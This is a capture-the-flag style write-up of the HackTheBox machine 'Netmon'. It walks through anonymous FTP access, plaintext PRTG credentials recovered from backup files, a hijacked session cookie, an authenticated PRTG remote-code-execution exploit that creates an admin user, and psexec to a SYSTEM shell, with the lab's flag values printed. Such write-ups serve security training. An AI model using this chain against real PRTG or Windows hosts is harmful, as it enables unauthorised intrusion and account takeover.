Not a complete walkthrough of HackTheBox VM "Netmon", more some structured notes on hacking it.
A quick NMAP scanning, gives us this..
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
PRTG Network Monitor 18.1.37.13946 (Se webpage i browser, det afslører versionen netmon kører)
So, we have something called Netmon from Paessler running, and Indy HTTPD 18.1.37.13946, some FTP that allow anonymous login, and Samba. So, we're in good shape..maybe..
https://www.cvedetails.com/cve/CVE-2018-19410/
https://www.cvedetails.com/cve/CVE-2018-19411/
https://www.exploit-db.com/exploits/46527Let's try that FTP server first, and see where that leads us.
ftp 10.129.1.126
Connected to 10.129.1.126.
220 Microsoft FTP Service
Name (10.129.1.126:nx): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
02-25-19 11:49PM <DIR> Windows
226 Transfer complete.So, we're logged in using a anonymous account, and can see "Program Files". I wonder what else we can see..
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
02-03-19 12:35AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 08:05AM <DIR> Documents
07-16-16 09:18AM <DIR> Downloads
07-16-16 09:18AM <DIR> Music
07-16-16 09:18AM <DIR> Pictures
02-03-19 12:35AM 33 user.txt
07-16-16 09:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.04 secs (0.8408 kB/s)
ftp>
cat user.txt
dd58ce67b49e15105e88096c8d9255a5Okay, we found user.txt, that's a start. But, we need system and root.txt. How do we get to that ?
ftp> cd "All Users"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp>
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
02-03-19 12:35AM <DIR> Public
226 Transfer complete.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
07-16-16 09:28AM <DIR> All Users
02-03-19 08:05AM <DIR> Default
07-16-16 09:28AM <DIR> Default User
07-16-16 09:16AM 174 desktop.ini
02-03-19 12:35AM <DIR> Public
226 Transfer complete.
ftp> cd "All Users"
250 CWD command successful.
ftp> cd "Application data\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
04-30-21 08:49AM <DIR> Configuration Auto-Backups
04-30-21 08:59AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
04-30-21 08:59AM <DIR> Logs (Web Server)
04-30-21 08:54AM <DIR> Monitoring Database
04-30-21 10:29AM 1201112 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
04-30-21 10:12AM 1694657 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
ftp> So, after some poking around, we found "Application data\Paessler\PRTG Network Monitor". Notice those files ending in .bak and .old ? Download them, and fire up gedit. Run control+f, and search for prtgadmin in them.
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>Hey look. Old credentials !. So, could we log into the system using prtgadmin and some variant of that password ?, yes we can. The new password is PrTg@dmin2019 and the user is prtgadmin.
Now, the problem is that one of the exploits we have, requires credentials in the form of a cookie. . We have those, but how to get the cookie ?. Remember a cookie is just a string sent after you log in, and is stored in the browser. So, fire up burpsuite proxy, and start intercepting. Log into the system, and notice the cookie string "OCTOPUS1813713946=e0MwQUY2NTEwLTU3QjYtNEExNS04RDAxLTA1QTIwRUJDNkE1MH0%3D"
So, we have a working cookie now. Keep the admin panel open, and get the exploit ready, and fire it..
└─# ./exploit.sh -u http://10.129.1.126 -c "OCTOPUS1813713946=e0MwQUY2NTEwLTU3QjYtNEExNS04RDAxLTA1QTIwRUJDNkE1MH0%3D"
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 This email address is being protected from spambots. You need JavaScript enabled to view it. [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
So, now we have a new user on the system, named pentest, with P3nT3st! as password. How do we use that ? We could try impackets psexec. https://github.com/SecureAuthCorp/impacket
psexec.py pentest:'P3nT3st!This email address is being protected from spambots. You need JavaScript enabled to view it. 1 ⨯
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.129.1.126.....
[*] Found writable share ADMIN$
[*] Uploading file MMKoUFTw.exe
[*] Opening SVCManager on 10.129.1.126.....
[*] Creating service Gcuy on 10.129.1.126.....
[*] Starting service Gcuy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
And after some poking around, we find the flags
C:\Users\Public>type user.txt
dd58ce67b49e15105e88096c8d9255a5
C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f75b879fba67cc
C:\Users\Administrator\Desktop>
That's it. If you followed along and got it to work, well done :)
No, go hunt for the next box, and give that a try, and build your skills, and have fun doing it ;)